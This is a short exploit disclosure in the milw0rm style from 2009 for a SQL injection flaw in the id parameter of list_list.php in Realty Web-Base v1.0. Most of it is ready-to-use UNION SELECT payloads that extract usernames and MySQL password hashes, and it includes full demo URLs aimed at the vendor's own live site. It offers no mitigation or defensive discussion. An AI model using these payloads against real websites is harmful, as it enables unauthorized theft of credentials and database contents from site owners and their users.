--------------------------------------------------------------- ------------------------------------------------------------ Realty Web-Base v1.0 (list_list.php id) SQL Injection Vulnerability --------------------------------------------------------------- Founder : ThE g0bL!N Home:WwW.h4ckF0u.CoM Vendor:http://www.realtywebware.com --------------------------------------------------------------- --------------------------------------------------------------- SQL Injection Vulnerability ------------------------------------------------ Exploit F0r user: ----------------- list_list.php?id=-1+UNION%20SELECT%20username,2+from+roundcube.users-- Exploit For Pass: ---------------- list_list.php?id=-1+UNION%20SELECT+password,2+from+mysql.user-- -------------------------------------- Dem0 ---- user: ----- http://www.realtywebware.com/demo/list_list.php?id=-1+UNION%20SELECT%20username,2+from+roundcube.users-- pass: ---- http://www.realtywebware.com/demo/list_list.php?id=-1+UNION%20SELECT+password,2+from+mysql.user-- -------------------------------------- Greeting To ALL My Friends (Dz) # milw0rm.com [2009-05-20]